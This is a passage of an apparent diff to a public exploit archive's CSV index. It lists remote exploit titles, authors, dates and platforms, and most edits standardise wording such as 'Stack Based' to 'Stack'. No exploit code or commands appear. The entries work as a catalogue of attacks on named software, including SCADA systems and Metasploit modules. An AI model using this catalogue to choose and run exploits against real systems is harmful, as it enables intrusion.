Stack Buffer Overflow",2011-01-01,rgod,remote,windows, 18245,exploits/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",remote,multiple, 15991,exploits/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",remote,windows, 15957,exploits/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",remote,windows, @@ -11717,7 +11718,7 @@ id,file,description,date,author,type,platform,port 17649,exploits/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,remote,windows, 17650,exploits/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,remote,windows, 17656,exploits/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,remote,windows, -17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, +17659,exploits/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit)",2011-08-13,Metasploit,remote,windows, 17670,exploits/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",remote,hardware, 17669,exploits/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,remote,windows, 17672,exploits/windows/remote/17672.html,"Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free",2011-08-16,mr_me,remote,windows, @@ -11728,7 +11729,7 @@ id,file,description,date,author,type,platform,port 17700,exploits/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution (Metasploit)",2011-08-19,Metasploit,remote,windows, 17719,exploits/windows/remote/17719.rb,"RealVNC - Authentication Bypass (Metasploit)",2011-08-26,Metasploit,remote,windows, 17721,exploits/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 - 'httpsrv.exe' Remote Overflow",2011-08-26,"Canberk BOLAT",remote,windows, -17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit)",2011-08-31,Metasploit,remote,windows, +17762,exploits/windows/remote/17762.rb,"Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit)",2011-08-31,Metasploit,remote,windows, 17810,exploits/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",remote,windows, 17819,exploits/windows/remote/17819.py,"KnFTP Server - Remote Buffer Overflow",2011-09-12,blake,remote,windows, 17827,exploits/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - 'Coreservice.exe' Remote Stack Buffer Overflow (Metasploit)",2011-09-12,Metasploit,remote,windows, @@ -11763,7 +11764,7 @@ id,file,description,date,author,type,platform,port 18102,exploits/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)",2011-11-09,Node,remote,windows, 18123,exploits/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)",2011-11-17,Metasploit,remote,windows, 18125,exploits/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,remote,windows, -18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)",2011-11-20,Metasploit,remote,windows, +18134,exploits/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack Buffer Overflow (Metasploit)",2011-11-20,Metasploit,remote,windows, 18138,exploits/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",remote,windows, 18145,exploits/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,remote,linux, 18171,exploits/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,remote,multiple, @@ -11974,6 +11975,7 @@ id,file,description,date,author,type,platform,port 19407,exploits/windows/remote/19407.py,"Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Remote Buffer Overflow",2012-06-27,"S2 Crew",remote,windows, 19361,exploits/windows/remote/19361.txt,"Microsoft IIS 3.0/4.0 - Double Byte Code Page",1999-06-24,Microsoft,remote,windows, 19363,exploits/multiple/remote/19363.txt,"Netscape FastTrack Server 3.0.1 - Fasttrack Root Directory Listing",1999-06-07,"Jesús López de Aguileta",remote,multiple, +19364,exploits/netware/remote/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,remote,netware, 19365,exploits/netware/remote/19365.txt,"Novell Netware 4.1/4.11 - SP5B NDS Default Rights",1999-04-09,"Simple Nomad",remote,netware, 19369,exploits/windows/remote/19369.rb,"Adobe Flash Player - Object Type Confusion (Metasploit)",2012-06-25,Metasploit,remote,windows, 19383,exploits/multiple/remote/19383.txt,"Qbik WinGate Standard 3.0.5 - Log Service Directory Traversal",1999-02-22,eEYe,remote,multiple, @@ -13302,6 +13304,7 @@ id,file,description,date,author,type,platform,port 23149,exploits/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",remote,windows, 23151,exploits/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",remote,linux, 23152,exploits/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,remote,windows, +23154,exploits/linux/remote/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",remote,linux, 23155,exploits/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)",2012-12-05,Metasploit,remote,windows, 23156,exploits/unix/remote/23156.rb,"(SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,remote,unix, 23157,exploits/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",remote,windows, @@ -13405,9 +13408,9 @@ id,file,description,date,author,type,platform,port 23472,exploits/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl - ActiveX ServerResourceVersion Property Overflow (Metasploit)",2012-12-18,Metasploit,remote,windows, 23489,exploits/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 - DLL Authentication Bypass",2003-12-29,Aphex,remote,windows, 23490,exploits/windows/remote/23490.txt,"Microsoft IIS 5.0 - Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",remote,windows, -23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1)",2003-12-29,fiNis,remote,windows, -23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,remote,windows, -23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",remote,windows, +23491,exploits/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1)",2003-12-29,fiNis,remote,windows, +23492,exploits/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (2)",2003-12-29,D4rkGr3y,remote,windows, +23493,exploits/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",remote,windows, 23695,exploits/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)",2004-02-13,anonymous,remote,windows, 23500,exploits/windows/remote/23500.rb,"InduSoft Web Studio - 'ISSymbol.ocx InternationalSeparator()' Heap Overflow (Metasploit)",2012-12-20,Metasploit,remote,windows, 23502,exploits/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",remote,windows, @@ -13635,7 +13638,7 @@ id,file,description,date,author,type,platform,port 24350,exploits/windows/remote/24350.txt,"Acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,remote,windows, 24353,exploits/unix/remote/24353.sql,"Oracle 9i - Multiple Vulnerabilities",2004-08-04,"Marco Ivaldi",remote,unix, 24354,exploits/windows/remote/24354.txt,"Microsoft Internet Explorer 6 - mms Protocol Handler Executable Command Line Injection",2004-08-05,"Nicolas Robillard",remote,windows, -24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,remote,linux, +24361,exploits/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (2)",2004-08-09,jsk,remote,linux, 24363,exploits/windows/remote/24363.txt,"clearswift MIMEsweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",remote,windows, 24376,exploits/multiple/remote/24376.txt,"Opera Web Browser 7.5 - Resource Detection",2004-07-17,"GreyMagic Software",remote,multiple, 24387,exploits/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 - HTML Injection",2004-08-20,"Audun Larsen",remote,multiple, @@ -13811,6 +13814,7 @@ id,file,description,date,author,type,platform,port 25066,exploits/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",remote,multiple, 25072,exploits/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data - Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",remote,multiple, 25079,exploits/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",remote,multiple, +25080,exploits/linux/remote/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities",2005-02-02,"Niels Heinen",remote,linux, 25092,exploits/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",remote,windows, 25094,exploits/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Remote Buffer Overflow",2005-02-08,ATmaCA,remote,windows, 25095,exploits/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,remote,windows, @@ -13988,7 +13992,6 @@ id,file,description,date,author,type,platform,port 26493,exploits/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, 26494,exploits/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",remote,windows, 26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows, -26497,exploits/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,remote,windows, 26529,exploits/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method (Metasploit)",2013-07-01,Metasploit,remote,multiple, 26531,exploits/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,remote,multiple, 26536,exploits/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,remote,linux, @@ -14322,7 +14325,7 @@ id,file,description,date,author,type,platform,port 29932,exploits/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",remote,linux, 29945,exploits/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",remote,hardware, 29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows, -29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,remote,windows, +29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Buffer Overflow",2007-05-07,MC,remote,windows, 30373,exploits/windows/remote/30373.py,"Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting",2013-12-17,"David Um",remote,windows, 30008,exploits/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,remote,java, 30009,exploits/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,remote,windows,12221 @@ -14384,7 +14387,7 @@ id,file,description,date,author,type,platform,port 30507,exploits/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, 30508,exploits/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",remote,multiple, 30521,exploits/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",remote,multiple, -30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow",2007-08-23,"Luigi Auriemma",remote,multiple, +30523,exploits/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Buffer Overflow",2007-08-23,"Luigi Auriemma",remote,multiple, 30532,exploits/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal",2007-08-27,titon,remote,windows, 30535,exploits/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning (1)",2007-08-27,"Amit Klein",remote,linux, 30536,exploits/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning (2)",2007-08-27,"Amit Klein",remote,linux, @@ -14397,7 +14400,7 @@ id,file,description,date,author,type,platform,port 30882,exploits/hardware/remote/30882.txt,"Thomson SpeedTouch 716 - 'URL' Cross-Site Scripting",2007-11-10,"Remco Verhoef",remote,hardware, 30883,exploits/windows/remote/30883.js,"BitDefender AntiVirus 2008 - 'bdelev.dll' ActiveX Control Double-Free",2007-11-11,"Lionel d'Hauenens",remote,windows, 30562,exploits/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,anonymous,remote,windows, -30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow",2007-09-04,miyy3t,remote,windows, +30565,exploits/windows/remote/30565.pl,"AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow",2007-09-04,miyy3t,remote,windows, 30567,exploits/windows/remote/30567.html,"Microsoft Agent - 'agentdpv.dll' ActiveX Control Malformed URL Stack Buffer Overflow",2007-09-11,"Yamata Li",remote,windows, 30569,exploits/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",remote,windows, 32417,exploits/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,remote,php, @@ -14500,7 +14503,7 @@ id,file,description,date,author,type,platform,port 31253,exploits/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Arbitrary Code Execution",2014-01-29,Mekanismen,remote,jsp,80 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21 -31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",remote,linux, +31462,exploits/linux/remote/31462.c,"Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",remote,linux, 31260,exploits/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",remote,windows,53 31264,exploits/php/remote/31264.rb,"Simple E-document - Arbitrary File Upload (Metasploit)",2014-01-29,Metasploit,remote,php,80 31279,exploits/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Cross-Site Scripting",2008-02-21,"Nir Goldshlager AVNE",remote,multiple, @@ -14621,7 +14624,7 @@ id,file,description,date,author,type,platform,port 32210,exploits/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Remote Buffer Overflow (Metasploit)",2014-03-12,Metasploit,remote,windows,20111 32223,exploits/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",remote,multiple, 32224,exploits/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",remote,multiple, -32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",remote,linux, +32225,exploits/linux/remote/32225.txt,"Vim - 'mch_expand_wildcards()' Heap Buffer Overflow",2005-01-29,"Brian Hirt",remote,linux, 32228,exploits/linux/remote/32228.xml,"Bugzilla 3.1.4 - '--attach_path' Directory Traversal",2008-08-12,"ilja van sprundel",remote,linux, 32286,exploits/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",remote,linux, 32289,exploits/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",remote,linux, @@ -14719,7 +14722,7 @@ id,file,description,date,author,type,platform,port 32879,exploits/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",remote,windows, 32885,exploits/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root Remote Code Execution (Metasploit)",2014-04-15,"Brandon Perry",remote,unix,443 32998,exploits/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak (2) (DTLS Support)",2014-04-24,"Ayman Sagy",remote,multiple, -32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,remote,windows, +32997,exploits/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Overflow",2014-04-24,An7i,remote,windows, 32919,exploits/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",remote,hardware, 32920,exploits/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site Scripting Vulnerabilities",2009-04-16,DSecRG,remote,multiple, 32921,exploits/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,remote,multiple, @@ -14821,7 +14824,7 @@ id,file,description,date,author,type,platform,port 33645,exploits/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,remote,windows, 33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple, 33311,exploits/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",remote,linux, -33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,remote,linux, +33313,exploits/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Buffer Overflow",2009-10-27,regenrecht,remote,linux, 33315,exploits/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,remote,linux, 33316,exploits/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,remote,multiple, 33594,exploits/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",remote,windows, @@ -14857,7 +14860,7 @@ id,file,description,date,author,type,platform,port 33540,exploits/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,remote,windows, 33552,exploits/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution",2010-01-21,"Lostmon Lords",remote,windows, 33553,exploits/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 - Digest Authentication Remote Buffer Overflow",2010-01-21,Intevydis,remote,multiple, -33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,remote,linux, +33554,exploits/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub",2014-05-28,bwall,remote,linux, 33562,exploits/multiple/remote/33562.html,"Google Chrome 3.0 - Style Sheet redirection Information Disclosure",2010-01-22,"Cesar Cerrudo",remote,multiple, 33563,exploits/windows/remote/33563.txt,"Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",remote,windows, 33567,exploits/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross-Site Scripting",2010-01-26,"Matias Pablo Brutti",remote,hardware, @@ -15006,7 +15009,7 @@ id,file,description,date,author,type,platform,port 34461,exploits/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",remote,multiple, 34462,exploits/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",remote,windows, 34478,exploits/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",remote,windows, -40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Stack Based Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, +40339,exploits/linux/remote/40339.py,"glibc - 'getaddrinfo' Remote Stack Buffer Overflow",2016-09-06,SpeeDr00t,remote,linux, 34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple, 34507,exploits/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",remote,linux, 34517,exploits/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution (Metasploit)",2014-09-01,Metasploit,remote,windows,5466 @@ -15187,7 +15190,6 @@ id,file,description,date,author,type,platform,port 35686,exploits/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Remote Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",remote,windows, 35688,exploits/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",remote,hardware, 35694,exploits/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,remote,windows, -35714,exploits/windows/remote/35714.pl,"BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow",2011-05-09,KedAns-Dz,remote,windows, 35703,exploits/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration",2011-05-04,"Anibal Vaz Marques",remote,multiple, 35729,exploits/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,remote,multiple, 35731,exploits/php/remote/35731.rb,"Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit)",2015-01-08,Metasploit,remote,php,80 @@ -15223,7 +15225,7 @@ id,file,description,date,author,type,platform,port 35997,exploits/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,remote,hardware, 35845,exploits/java/remote/35845.rb,"ManageEngine (Multiple Products) - Authenticated Arbitrary File Upload (Metasploit)",2015-01-20,Metasploit,remote,java,8080 35855,exploits/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",remote,php, -35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, +35864,exploits/windows/remote/35864.txt,"Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities",2011-06-17,"Dillon Beresford",remote,windows, 35880,exploits/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",remote,windows, 35881,exploits/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",remote,windows, 35885,exploits/windows/remote/35885.txt,"Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow",2011-06-27,"Luigi Auriemma",remote,windows, @@ -15344,7 +15346,7 @@ id,file,description,date,author,type,platform,port 36810,exploits/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 36811,exploits/php/remote/36811.rb,"WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 36812,exploits/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,remote,php,80 -36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",remote,windows, +36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",remote,windows, 36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, 36832,exploits/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, 36833,exploits/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware, @@ -15399,7 +15401,7 @@ id,file,description,date,author,type,platform,port 37523,exploits/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,remote,multiple, 37536,exploits/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,remote,multiple, 37542,exploits/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,remote,windows, -37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",remote,linux, +37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Buffer Overflow",2012-08-07,"Charlie Miller",remote,linux, 37597,exploits/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,remote,hardware,443 37598,exploits/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,remote,multiple,5900 37599,exploits/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,remote,windows, @@ -15554,7 +15556,7 @@ id,file,description,date,author,type,platform,port 38732,exploits/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 38733,exploits/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,remote,php,9999 38741,exploits/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",remote,linux, -38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos 